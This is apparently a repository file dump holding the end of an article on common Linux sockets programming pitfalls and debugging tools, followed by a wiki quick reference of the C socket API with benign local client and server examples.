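For a small fixed-layout message, the same goal (both endpoints interpreting the bytes identically) can also be reached by hand: write each field into a byte buffer in network byte order instead of sending the C structure itself. The sketch below is only an illustration; the reading structure and the function names are hypothetical and not part of XDR, XML-RPC, or SOAP.

```c
#include <stdint.h>
#include <string.h>
#include <arpa/inet.h>

/* Hypothetical message type, used only for this illustration. */
struct reading {
    uint32_t sensor_id;
    uint16_t value;
};

#define READING_WIRE_SIZE 6   /* 4-byte id + 2-byte value, no padding */

/* Encode r into exactly READING_WIRE_SIZE bytes in network byte order. */
void reading_encode(const struct reading *r, unsigned char *out)
{
    uint32_t id = htonl(r->sensor_id);
    uint16_t v = htons(r->value);

    memcpy(out, &id, sizeof(id));       /* bytes 0..3 */
    memcpy(out + 4, &v, sizeof(v));     /* bytes 4..5 */
}

/* Decode READING_WIRE_SIZE bytes back into host representation. */
void reading_decode(const unsigned char *in, struct reading *r)
{
    uint32_t id;
    uint16_t v;

    memcpy(&id, in, sizeof(id));
    memcpy(&v, in + 4, sizeof(v));
    r->sensor_id = ntohl(id);
    r->value = ntohs(v);
}
```

Because the layout is fixed by the encoder rather than by the compiler, structure padding and host endianness no longer matter to the receiver.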
|
||||
|
||||
|
||||
|
||||
Pitfall 5. Framing assumptions in TCP
|
||||
|
||||
TCP provides no framing, which makes it perfect for byte-stream-oriented protocols. This is one of the key differences between TCP and the User Datagram Protocol (UDP). UDP is a message-oriented protocol that preserves the boundaries of messages between the sender and receiver. TCP is a stream-based protocol that assumes the data being communicated is unstructured, as shown in Figure 1.
|
||||
|
||||
Figure 1. Framing capabilities of UDP and the lack of framing in TCP
|
||||
|
||||
|
||||
The top of Figure 1 illustrates a UDP client and server. The peer on the left performs two socket writes of 100 bytes each. The UDP layer of the stack keeps track of the quantities of the writes and ensures that when the receiver on the right gets the data through the socket, it arrives in the same quantities. In other words, the boundaries of the messages that the writer provides are preserved for the reader.
|
||||
|
||||
Now, look at the bottom of Figure 1. It demonstrates the same granularity of writes for the TCP layer. Two independent writes to the stream socket of 100 bytes each are performed. But in this case, the reader of the stream socket can get all 200 bytes in a single read. The TCP layer of the stack has aggregated the two writes. This aggregation can occur in either the sender or receiver TCP/IP stacks. It's important to note that the aggregation may not occur: TCP guarantees only that the bytes arrive reliably and in order, not where the boundaries between reads fall.
|
||||
|
||||
This pitfall causes a quandary for most developers. You want the reliability of TCP but the framing aspects of UDP. Other than switching to a different transport protocol, such as the Stream Control Transmission Protocol (SCTP), it's up to the application layer developer to implement the buffering and segmenting functionality.
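One common way to implement that buffering and segmenting is a length prefix: each message is preceded by its size, and the receiver accumulates bytes until a whole message is present. The sketch below works on memory buffers only; the 4-byte header and the names frame_encode and frame_decode are assumptions made for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <arpa/inet.h>

#define FRAME_HDR 4   /* 32-bit payload length, network byte order */

/* Write header + payload into out, which must hold FRAME_HDR + len bytes.
 * Returns the total number of bytes written. */
size_t frame_encode(const void *payload, uint32_t len, unsigned char *out)
{
    uint32_t n = htonl(len);

    memcpy(out, &n, FRAME_HDR);
    memcpy(out + FRAME_HDR, payload, len);
    return FRAME_HDR + (size_t)len;
}

/* Look for one complete frame at the start of buf[0..avail).
 * On success, sets *payload and *len and returns the bytes consumed.
 * Returns 0 if more data has to be read from the socket first. */
size_t frame_decode(const unsigned char *buf, size_t avail,
                    const unsigned char **payload, uint32_t *len)
{
    uint32_t n;

    if (avail < FRAME_HDR)
        return 0;                       /* header incomplete */
    memcpy(&n, buf, FRAME_HDR);
    n = ntohl(n);
    if (avail - FRAME_HDR < n)
        return 0;                       /* payload incomplete */
    *payload = buf + FRAME_HDR;
    *len = n;
    return FRAME_HDR + (size_t)n;
}
```

A receiver would append whatever read returns to a buffer, call frame_decode in a loop, and discard the consumed bytes after each complete frame. A real protocol would also cap the accepted length to guard against a corrupt or hostile header.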
|
||||
|
||||
|
||||
|
||||
Tools for debugging sockets applications
|
||||
|
||||
GNU/Linux provides several debugging tools that can help you uncover problems in sockets applications. Further, using these tools can also be educational and help explain the behavior of your application and the TCP/IP stack. You'll get a quick overview of a few tools here, but check out the Resources below to learn more.
|
||||
|
||||
Viewing details of the networking subsystem
|
||||
|
||||
The netstat tool provides visibility into the GNU/Linux networking subsystem. With netstat, you can view currently active connections (on a per-protocol basis), view connections in a particular state (such as server sockets in the listening state), and many others. Listing 4 shows some of the options that netstat provides and the features they enable.
|
||||
|
||||
Listing 4. Usage patterns for the netstat utility
|
||||
|
||||
View all TCP sockets currently active
|
||||
$ netstat --tcp
|
||||
|
||||
View all UDP sockets
|
||||
$ netstat --udp
|
||||
|
||||
View all TCP sockets in the listening state
|
||||
$ netstat --tcp --listening
|
||||
|
||||
View the multicast group membership information
|
||||
$ netstat --groups
|
||||
|
||||
Display the list of masqueraded connections
|
||||
$ netstat --masquerade
|
||||
|
||||
View statistics for each protocol
|
||||
$ netstat --statistics
|
||||
|
||||
|
||||
A lot of other utilities exist, but netstat tends to be a one-stop shop that covers the capabilities of route, ifconfig, and other standard GNU/Linux tools.
|
||||
|
||||
Watching the traffic go by
|
||||
|
||||
With GNU/Linux, you can use several tools to inspect the low-level traffic on a network. The tcpdump tool is an older tool that "sniffs" network packets from a network and either prints them to stdout or logs them to a file. This functionality allows you to see the traffic that your application generates and also the low-level flow-control mechanisms that TCP generates. A newer tool called tcpflow complements tcpdump and provides a way to do protocol flow analysis and to properly reconstruct data streams, regardless of packet order or retransmissions. A couple of usage patterns for tcpdump are shown in Listing 5.
|
||||
|
||||
Listing 5. Usage patterns for the tcpdump tool
|
||||
|
||||
Display all traffic on the eth0 interface for the local host
|
||||
$ tcpdump -l -i eth0
|
||||
|
||||
Show all traffic on the network coming from or going to host plato
|
||||
$ tcpdump host plato
|
||||
|
||||
Show all HTTP traffic for host camus
|
||||
$ tcpdump 'host camus and (port http)'
|
||||
|
||||
View traffic coming from or going to TCP port 45000 on the local host
|
||||
$ tcpdump tcp port 45000
|
||||
|
||||
|
||||
The tcpdump and tcpflow tools give you a huge number of options, including the ability to create complex filter expressions. Check the Resources below for more information on these tools.
|
||||
|
||||
Both tcpdump and tcpflow are text-based command-line tools. If you prefer a graphical user interface (GUI), an open source tool called Ethereal may fit the bill. Ethereal is a professional protocol analyzer that can help debug application layer protocols. Its plug-in architecture can decompose protocols such as HTTP or any other protocol you can think of (637 protocols at the time of this writing).
|
||||
|
||||
|
||||
|
||||
Wrapup
|
||||
|
||||
Sockets programming is easy and enjoyable, especially if you avoid introducing bugs or at least make them easy to find by considering the five common pitfalls described in this article, in addition to standard defensive programming practices. GNU/Linux tools and utilities can also help bring to light problems in your programs. Remember: when checking out the man page of a utility, follow the related or "see also" tools. You might find a new tool that you can't do without.
|
||||
|
||||
Resources
|
||||
|
||||
Learn
|
||||
|
||||
The TCP State Machine includes eleven states. See W. Richard Stevens's illustration from TCP/IP Illustrated, Volume 1.
|
||||
|
||||
Explore the history and implications of Endianness at Wikipedia.
|
||||
|
||||
Learn more about IBM's open, scalable, and customizable Power Architecture.
|
||||
|
||||
Read an introduction to RPC/XDR from the Programming in C courseware.
|
||||
|
||||
For more on XML-RPC and how to use it in a Java™ application, read "XML-RPC in Java programming" (developerWorks, January 2004).
|
||||
|
||||
SOAP builds on the features of XML-RPC. Find specifications, implementations, and tutorials and articles at SoapWare.Org.
|
||||
|
||||
SCTP combines features of TCP and UDP as well as features for availability and reliability.
|
||||
|
||||
The tutorial "Programming Linux sockets, Part 1" (developerWorks, October 2003) shows how to begin programming with sockets and how to build an echo server and client that connect over TCP/IP. "Programming Linux sockets, Part 2" (developerWorks, January 2004) focuses on UDP and shows how to write UDP sockets applications in C and in Python (although the code will translate well to other languages).
|
||||
|
||||
The netstat manual page provides detail on the various ways to use it.
|
||||
|
||||
BSD Sockets Programming from a Multilanguage Perspective by M. Tim Jones covers techniques in sockets programming in six different languages.
|
||||
|
||||
Find more resources for Linux developers in the developerWorks Linux zone.
|
||||
|
||||
Get products and technologies
|
||||
|
||||
The tcpdump and tcpflow utilities can be used to monitor network traffic.
|
||||
|
||||
The Ethereal network protocol analyzer provides the functionality of tcpdump but with a graphical UI and scalable plug-in architecture.
|
||||
|
||||
Order the SEK for Linux, a two-DVD set containing the latest IBM trial software for Linux from DB2®, Lotus®, Rational®, Tivoli®, and WebSphere®.
|
||||
|
||||
Build your next development project on Linux with IBM trial software, available for download directly from developerWorks.
|
||||
|
||||
|
||||
Discuss
|
||||
|
||||
Get involved in the developerWorks community by participating in developerWorks blogs.
|
||||
|
||||
810
Zim/Programme/APUE/Linux_C_Socket_Quick_Reference.txt
Normal file
@@ -0,0 +1,810 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-04T16:27:14+08:00
|
||||
|
||||
====== Linux C Socket Quick Reference ======
|
||||
Created Saturday 04 June 2011
|
||||
http://cloudhe.iteye.com/blog/147467
|
||||
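1. accept (accept a socket connection)

Related functions: socket, bind, listen, connect

Header files: #include <sys/types.h>
#include <sys/socket.h>

Prototype: int accept(int s, struct sockaddr *addr, socklen_t *addrlen);

Description: accept() accepts a connection on the socket s. The socket must first have been set up with bind() and listen(). When a connection arrives, accept() returns a new socket descriptor; all further sending and receiving goes through the new socket, while the original socket s can keep calling accept() to take new connection requests. On success, the structure that addr points to is filled in with the remote host's address. addrlen must point to the size of that structure on entry and holds the size of the stored address on return. For the definition of struct sockaddr, see bind().

Return value: the new socket descriptor on success; -1 on failure, with the cause stored in errno.

Error codes:
EBADF s is not a valid socket descriptor
EFAULT addr points to inaccessible memory
ENOTSOCK s is a file descriptor, not a socket
EOPNOTSUPP the socket is not of type SOCK_STREAM
EPERM firewall rules forbid the connection
ENOBUFS not enough system buffer memory
ENOMEM not enough kernel memory

Example: see listen().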
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
2. bind (give a socket an address)

Related functions: socket, accept, connect, listen

Header files: #include <sys/types.h>
#include <sys/socket.h>

Prototype: int bind(int sockfd, const struct sockaddr *my_addr, socklen_t addrlen);

Description: bind() assigns a name (address) to the socket sockfd. The name is given by my_addr, which points to a sockaddr structure. A generic structure is defined for all socket domains:

struct sockaddr
{
    unsigned short int sa_family;
    char sa_data[14];
};

sa_family is the domain argument that was passed to socket(), that is, an AF_xxxx value.
sa_data holds at most 14 bytes.
The actual layout depends on the socket domain. For the AF_INET domain, for example, the structure is sockaddr_in:

struct sockaddr_in
{
    unsigned short int sin_family;
    uint16_t sin_port;
    struct in_addr sin_addr;
    unsigned char sin_zero[8];
};
struct in_addr
{
    uint32_t s_addr;
};

sin_family is the same as sa_family.
sin_port is the port number, in network byte order.
sin_addr.s_addr is the IP address, in network byte order.
sin_zero is unused.

addrlen is the size of the address structure passed in my_addr.

Return value: 0 on success; -1 on failure, with the cause stored in errno.

Error codes:
EBADF sockfd is not a valid socket descriptor
EACCES insufficient permission
ENOTSOCK sockfd is a file descriptor, not a socket

Example: see listen().
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
3. connect (establish a socket connection)

Related functions: socket, bind, listen

Header files: #include <sys/types.h>
#include <sys/socket.h>

Prototype: int connect(int sockfd, const struct sockaddr *serv_addr, socklen_t addrlen);

Description: connect() connects the socket sockfd to the network address given by serv_addr. For struct sockaddr, see bind(). addrlen is the size of the address structure.

Return value: 0 on success; -1 on failure, with the cause stored in errno.

Error codes:
EBADF sockfd is not a valid socket descriptor
EFAULT serv_addr points to inaccessible memory
ENOTSOCK sockfd is a file descriptor, not a socket
EISCONN the socket is already connected
ECONNREFUSED the server refused the connection request
ETIMEDOUT the connection attempt timed out without a response
ENETUNREACH packets cannot be delivered to the specified host
EAFNOSUPPORT the sa_family of the sockaddr structure is wrong
EALREADY the socket is non-blocking and a previous connection attempt has not completed yet

Example:

/* TCP client using sockets.
   This program connects to a TCP server and sends it the strings typed on the keyboard.
   For the TCP server example, see listen().
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define PORT 1234
#define SERVER_IP "127.0.0.1"

int main(void)
{
    int s;
    ssize_t n;
    struct sockaddr_in addr;
    char buffer[256];
    if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        perror("socket");
        exit(1);
    }
    /* Fill in the sockaddr_in structure */
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(PORT);
    addr.sin_addr.s_addr = inet_addr(SERVER_IP);
    /* Try to connect */
    if (connect(s, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
        perror("connect");
        exit(1);
    }
    /* Receive the greeting sent by the server */
    n = recv(s, buffer, sizeof(buffer) - 1, 0);
    if (n < 0) {
        perror("recv");
        exit(1);
    }
    buffer[n] = '\0';
    printf("%s\n", buffer);
    /* Read strings from standard input until end of file */
    while ((n = read(STDIN_FILENO, buffer, sizeof(buffer))) > 0) {
        /* Send only the bytes actually read to the server */
        if (send(s, buffer, n, 0) < 0) {
            perror("send");
            exit(1);
        }
    }
    close(s);
    return 0;
}

Run: $ ./connect
Welcome to server!
hi I am client! /* typed on the keyboard */
/* <Ctrl+C> interrupts the program */
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
4. endprotoent (stop reading network protocol data)

Related functions: getprotoent, getprotobyname, getprotobynumber, setprotoent

Header files: #include <netdb.h>

Prototype: void endprotoent(void);

Description: endprotoent() closes the file opened by getprotoent().

Return value: none.

Example: see getprotoent().
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
5. endservent (stop reading network service data)

Related functions: getservent, getservbyname, getservbyport, setservent

Header files: #include <netdb.h>

Prototype: void endservent(void);

Description: endservent() closes the file opened by getservent().

Return value: none.

Example: see getservent().
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
6. getsockopt (get socket options)

Related functions: setsockopt

Header files: #include <sys/types.h>
#include <sys/socket.h>

Prototype: int getsockopt(int s, int level, int optname, void *optval, socklen_t *optlen);

Description: getsockopt() returns the state of an option of the socket s. optname selects the option to query, optval points to the memory where the result is stored, and optlen points to the size of that memory. For level and optname, see setsockopt().

Return value: 0 on success; -1 on error, with the cause stored in errno.

Error codes:
EBADF s is not a valid socket descriptor
ENOTSOCK s is a file descriptor, not a socket
ENOPROTOOPT the option given by optname is not valid
EFAULT optval points to inaccessible memory

Example:

#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>

int main(void)
{
    int s, optval;
    socklen_t optlen = sizeof(optval);
    if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        perror("socket");
        return 1;
    }
    if (getsockopt(s, SOL_SOCKET, SO_TYPE, &optval, &optlen) < 0)
        perror("getsockopt");
    else
        printf("optval = %d\n", optval);
    close(s);
    return 0;
}

Run: optval = 1 /* the value SOCK_STREAM is defined as */
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
7. htonl (convert a 32-bit value from host byte order to network byte order)

Related functions: htons, ntohl, ntohs

Header files: #include <netinet/in.h>

Prototype: uint32_t htonl(uint32_t hostlong);

Description: htonl() converts the 32-bit value hostlong to network byte order.

Return value: the value in network byte order.

Example: see getservbyport() or connect().
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
8. htons (convert a 16-bit value from host byte order to network byte order)

Related functions: htonl, ntohl, ntohs

Header files: #include <netinet/in.h>

Prototype: uint16_t htons(uint16_t hostshort);

Description: htons() converts the 16-bit value hostshort to network byte order.

Return value: the value in network byte order.

Example: see connect().
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
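9. inet_addr (convert a network address string to a binary number)

Related functions: inet_aton, inet_ntoa

Header files: #include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

Prototype: in_addr_t inet_addr(const char *cp);

Description: inet_addr() converts the network address string cp into the binary number used on the network (network byte order). The string consists of digits and dots, for example "163.13.132.68".

Return value: the binary network address on success; INADDR_NONE (usually -1) on failure. Because -1 is also the value of the valid address 255.255.255.255, inet_aton() is the safer choice.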
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
10. inet_aton (convert a network address string to a binary network number)

Related functions: inet_addr, inet_ntoa

Header files: #include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

Prototype: int inet_aton(const char *cp, struct in_addr *inp);

Description: inet_aton() converts the network address string cp into the binary number used on the network and stores it in the in_addr structure that inp points to.
The in_addr structure is defined as follows:

struct in_addr
{
    uint32_t s_addr;
};

Return value: nonzero on success; 0 on failure.
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
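11. inet_ntoa (convert a binary network number to a network address string)

Related functions: inet_addr, inet_aton

Header files: #include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

Prototype: char *inet_ntoa(struct in_addr in);

Description: inet_ntoa() converts the binary network number in to a dotted network address string and returns a pointer to that string.

Return value: a pointer to the string. The string is stored in a statically allocated buffer that later calls overwrite.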
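The two conversions above can be combined into a round trip from text to binary and back. This is a minimal sketch; the helper name ipv4_roundtrip is hypothetical.

```c
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* Hypothetical helper: parse dotted-quad text with inet_aton() and format
 * it back with inet_ntoa(). Returns 0 on success, -1 if text is not a
 * valid address or out is too small. */
int ipv4_roundtrip(const char *text, char *out, size_t outlen)
{
    struct in_addr addr;
    int n;

    if (inet_aton(text, &addr) == 0)
        return -1;                      /* 0 means "invalid address" */

    /* inet_ntoa() returns a static buffer, so copy the result at once. */
    n = snprintf(out, outlen, "%s", inet_ntoa(addr));
    return (n >= 0 && (size_t)n < outlen) ? 0 : -1;
}
```

A buffer of INET_ADDRSTRLEN bytes is large enough for any IPv4 address in this form.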
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
12. listen (wait for connections)

Related functions: socket, bind, accept, connect

Header files: #include <sys/socket.h>

Prototype: int listen(int s, int backlog);

Description: listen() puts the socket s into the listening state. backlog sets the maximum number of pending connection requests; when the queue is full, the client may receive an ECONNREFUSED error. listen() does not accept connections itself, it only puts the socket into listen mode; the call that actually accepts a client connection is accept(). listen() is normally called after socket() and bind(), and before accept().

Return value: 0 on success; -1 on failure, with the cause stored in errno.

Notes: listen() applies only to sockets of type SOCK_STREAM or SOCK_SEQPACKET. For AF_INET sockets the backlog is capped by a system limit (SOMAXCONN, traditionally 128).

Error codes:
EBADF s is not a valid socket descriptor
EACCES insufficient permission
EOPNOTSUPP the socket does not support listen mode

Example:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define PORT 1234
#define MAXSOCKFD 10

int main(void)
{
    int sockfd, newsockfd, is_connected[MAXSOCKFD], fd;
    struct sockaddr_in addr;
    socklen_t addr_len;
    fd_set readfds;
    char buffer[256];
    char msg[] = "Welcome to server!";
    ssize_t n;

    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        perror("socket");
        exit(1);
    }
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(PORT);
    addr.sin_addr.s_addr = htonl(INADDR_ANY);
    if (bind(sockfd, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
        perror("bind");
        exit(1);
    }
    if (listen(sockfd, 3) < 0) {
        perror("listen");
        exit(1);
    }
    for (fd = 0; fd < MAXSOCKFD; fd++)
        is_connected[fd] = 0;
    while (1) {
        FD_ZERO(&readfds);
        FD_SET(sockfd, &readfds);
        for (fd = 0; fd < MAXSOCKFD; fd++)
            if (is_connected[fd])
                FD_SET(fd, &readfds);
        if (select(MAXSOCKFD, &readfds, NULL, NULL, NULL) <= 0)
            continue;
        for (fd = 0; fd < MAXSOCKFD; fd++) {
            if (!FD_ISSET(fd, &readfds))
                continue;
            if (fd == sockfd) {
                /* New connection on the listening socket */
                addr_len = sizeof(addr);
                if ((newsockfd = accept(sockfd, (struct sockaddr *)&addr, &addr_len)) < 0) {
                    perror("accept");
                    continue;
                }
                if (newsockfd >= MAXSOCKFD) { /* outside the range select() watches */
                    close(newsockfd);
                    continue;
                }
                write(newsockfd, msg, sizeof(msg));
                is_connected[newsockfd] = 1;
                printf("connect from %s\n", inet_ntoa(addr.sin_addr));
            } else {
                /* Data, or end of stream, from a connected client */
                n = read(fd, buffer, sizeof(buffer) - 1);
                if (n <= 0) {
                    printf("connection closed.\n");
                    is_connected[fd] = 0;
                    close(fd);
                } else {
                    buffer[n] = '\0';
                    printf("%s", buffer);
                }
            }
        }
    }
}

Run: $ ./listen
connect from 127.0.0.1
hi I am client
connection closed.
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
13. ntohl (convert a 32-bit value from network byte order to host byte order)

Related functions: htonl, htons, ntohs

Header files: #include <netinet/in.h>

Prototype: uint32_t ntohl(uint32_t netlong);

Description: ntohl() converts the 32-bit value netlong to host byte order.

Return value: the value in host byte order.

Example: see getservent().
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
14. ntohs (convert a 16-bit value from network byte order to host byte order)

Related functions: htonl, htons, ntohl

Header files: #include <netinet/in.h>

Prototype: uint16_t ntohs(uint16_t netshort);

Description: ntohs() converts the 16-bit value netshort to host byte order.

Return value: the value in host byte order.

Example: see getservent().
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
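15. recv (receive data through a socket)

Related functions: recvfrom, recvmsg, send, sendto, socket

Header files: #include <sys/types.h>
#include <sys/socket.h>

Prototype: ssize_t recv(int s, void *buf, size_t len, int flags);

Description: recv() receives data sent by the remote host through the socket s and stores it in the memory that buf points to. len is the maximum number of bytes that can be received.

flags is normally 0. Other values are:
MSG_OOB receive data that was sent out-of-band
MSG_PEEK the returned data is not removed from the system; a later recv() returns the same data again
MSG_WAITALL do not return until len bytes have been received, unless an error or a signal occurs
MSG_NOSIGNAL the operation should not be interrupted by a SIGPIPE signal

Return value: the number of bytes received on success; -1 on failure, with the cause stored in errno.

Error codes:
EBADF s is not a valid socket descriptor
EFAULT one of the pointer arguments points to inaccessible memory
ENOTSOCK s is a file descriptor, not a socket
EINTR interrupted by a signal
EAGAIN the operation would block, but the socket s is non-blocking
ENOBUFS not enough system buffer memory
ENOMEM not enough kernel memory
EINVAL an argument passed to the system call is invalid

Example: see listen().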
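The flags and the return value of recv() can be illustrated with two small helpers. This is a sketch only; the names peek_bytes and recv_exact are hypothetical. The first uses MSG_PEEK to look at pending data without consuming it, the second loops because recv() on a stream socket may return fewer bytes than requested.

```c
#include <errno.h>
#include <stddef.h>
#include <sys/types.h>
#include <sys/socket.h>

/* Hypothetical helper: copy up to len pending bytes into buf without
 * removing them from the socket. Returns what recv() returns. */
ssize_t peek_bytes(int fd, void *buf, size_t len)
{
    return recv(fd, buf, len, MSG_PEEK);
}

/* Hypothetical helper: read exactly len bytes, looping over short reads.
 * Returns 0 on success, -1 on error or if the peer closes first. */
int recv_exact(int fd, void *buf, size_t len)
{
    char *p = buf;

    while (len > 0) {
        ssize_t n = recv(fd, p, len, 0);
        if (n < 0 && errno == EINTR)
            continue;          /* interrupted by a signal: retry */
        if (n <= 0)
            return -1;         /* error, or end of stream (n == 0) */
        p += n;
        len -= (size_t)n;
    }
    return 0;
}
```

Passing MSG_WAITALL to a single recv() call is an alternative to the loop, but it can still return early on a signal or error, so the loop is the more defensive form.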
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
16. recvfrom (receive data through a socket)

Related functions: recv, recvmsg, send, sendto, socket

Header files: #include <sys/types.h>
#include <sys/socket.h>

Prototype: ssize_t recvfrom(int s, void *buf, size_t len, int flags, struct sockaddr *from, socklen_t *fromlen);

Description: recvfrom() receives data sent by a remote host through the socket s and stores it in the memory that buf points to. len is the maximum number of bytes that can be received. flags is normally 0; for other values see recv(). from points to a structure that is filled in with the sender's network address; for struct sockaddr, see bind(). fromlen points to the size of that structure.

Return value: the number of bytes received on success; -1 on failure, with the cause stored in errno.

Error codes:
EBADF s is not a valid socket descriptor
EFAULT one of the pointer arguments points to inaccessible memory
ENOTSOCK s is a file descriptor, not a socket
EINTR interrupted by a signal
EAGAIN the operation would block, but the socket s is non-blocking
ENOBUFS not enough system buffer memory
ENOMEM not enough kernel memory
EINVAL an argument passed to the system call is invalid

Example:

/* UDP client using sockets.
   This program sends the strings typed on the keyboard to a UDP server and prints the replies.
   For the UDP server example, see sendto().
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define PORT 2345
#define SERVER_IP "127.0.0.1"

int main(void)
{
    int s;
    ssize_t len;
    struct sockaddr_in addr;
    socklen_t addr_len;
    char buffer[256];
    /* Create the socket */
    if ((s = socket(AF_INET, SOCK_DGRAM, 0)) < 0) {
        perror("socket");
        exit(1);
    }
    /* Fill in sockaddr_in */
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(PORT);
    addr.sin_addr.s_addr = inet_addr(SERVER_IP);
    /* Read strings from standard input until end of file */
    while ((len = read(STDIN_FILENO, buffer, sizeof(buffer))) > 0) {
        /* Send the string to the server */
        sendto(s, buffer, len, 0, (struct sockaddr *)&addr, sizeof(addr));
        /* Receive the string the server sends back */
        addr_len = sizeof(addr);
        len = recvfrom(s, buffer, sizeof(buffer) - 1, 0, (struct sockaddr *)&addr, &addr_len);
        if (len < 0) {
            perror("recvfrom");
            exit(1);
        }
        buffer[len] = '\0';
        printf("receive: %s", buffer);
    }
    return 0;
}

Run: (start the UDP server first, then the UDP client)
hello /* string typed on the keyboard */
receive: hello /* string sent back by the server */
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
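17. recvmsg (receive data through a socket)

Related functions: recv, recvfrom, send, sendto, sendmsg, socket

Header files: #include <sys/types.h>
#include <sys/socket.h>

Prototype: ssize_t recvmsg(int s, struct msghdr *msg, int flags);

Description: recvmsg() receives data sent by a remote host through the socket s. s is a connected socket; with UDP no connection step is needed. msg points to the msghdr structure that describes where the data is stored. flags is normally 0; for other values see recv(). For the definition of struct msghdr, see sendmsg().

Return value: the number of bytes received on success; -1 on failure, with the cause stored in errno.

Error codes:
EBADF s is not a valid socket descriptor
EFAULT one of the pointer arguments points to inaccessible memory
ENOTSOCK s is a file descriptor, not a socket
EINTR interrupted by a signal
EAGAIN the operation would block, but the socket s is non-blocking
ENOBUFS not enough system buffer memory
ENOMEM not enough kernel memory
EINVAL an argument passed to the system call is invalid

Example: see recvfrom().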
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
18. send (send data through a socket)

Related functions: sendto, sendmsg, recv, recvfrom, socket

Header files: #include <sys/types.h>
#include <sys/socket.h>

Prototype: ssize_t send(int s, const void *msg, size_t len, int flags);

Description: send() sends data to the peer host through the socket s. s is a connected socket. msg points to the data to send and len is its length. flags is normally 0. Other values are:
MSG_OOB send the data out-of-band
MSG_DONTROUTE bypass the routing table lookup
MSG_DONTWAIT make this operation non-blocking
MSG_NOSIGNAL the operation should not be interrupted by a SIGPIPE signal

Return value: the number of bytes actually sent on success; -1 on failure, with the cause stored in errno.

Error codes:
EBADF s is not a valid socket descriptor
EFAULT one of the pointer arguments points to inaccessible memory
ENOTSOCK s is a file descriptor, not a socket
EINTR interrupted by a signal
EAGAIN the operation would block, but the socket s is non-blocking
ENOBUFS not enough system buffer memory
ENOMEM not enough kernel memory
EINVAL an argument passed to the system call is invalid

Example: see connect().
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
19. sendmsg (send data through a socket)

Related functions: send, sendto, recv, recvfrom, recvmsg, socket

Header files: #include <sys/types.h>
#include <sys/socket.h>

Prototype: ssize_t sendmsg(int s, const struct msghdr *msg, int flags);

Description: sendmsg() sends data to the peer host through the socket s. s is a connected socket; with UDP no connection step is needed. msg points to the msghdr structure that describes the data to send. flags is normally 0; for other values see send().
The msghdr structure is defined as follows:

struct msghdr
{
    void *msg_name;          /* Address to send to / receive from */
    socklen_t msg_namelen;   /* Length of address data */
    struct iovec *msg_iov;   /* Vector of data to send / receive into */
    size_t msg_iovlen;       /* Number of elements in the vector */
    void *msg_control;       /* Ancillary data */
    size_t msg_controllen;   /* Ancillary data buffer length */
    int msg_flags;           /* Flags on received message */
};

Return value: the number of bytes actually sent on success; -1 on failure, with the cause stored in errno.

Error codes:
EBADF s is not a valid socket descriptor
EFAULT one of the pointer arguments points to inaccessible memory
ENOTSOCK s is a file descriptor, not a socket
EINTR interrupted by a signal
EAGAIN the operation would block, but the socket s is non-blocking
ENOBUFS not enough system buffer memory
ENOMEM not enough kernel memory
EINVAL an argument passed to the system call is invalid

Example: see sendto().
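The main practical use of the msg_iov vector is a gather write: several separate buffers go out in one call. The sketch below assumes a socket that needs no destination address (connected, or one end of a socketpair); the helper name send_two_parts is hypothetical.

```c
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/uio.h>

/* Hypothetical helper: send a header and a body with one sendmsg() call.
 * Returns what sendmsg() returns: bytes sent, or -1 with errno set. */
ssize_t send_two_parts(int fd, const void *hdr, size_t hdr_len,
                       const void *body, size_t body_len)
{
    struct iovec iov[2];
    struct msghdr msg;

    iov[0].iov_base = (void *)hdr;    /* iov_base is not const-qualified */
    iov[0].iov_len = hdr_len;
    iov[1].iov_base = (void *)body;
    iov[1].iov_len = body_len;

    memset(&msg, 0, sizeof(msg));     /* no address, no ancillary data */
    msg.msg_iov = iov;
    msg.msg_iovlen = 2;

    return sendmsg(fd, &msg, 0);
}
```

On a datagram socket the two buffers arrive as a single message, which avoids copying header and payload into one temporary buffer first.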
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
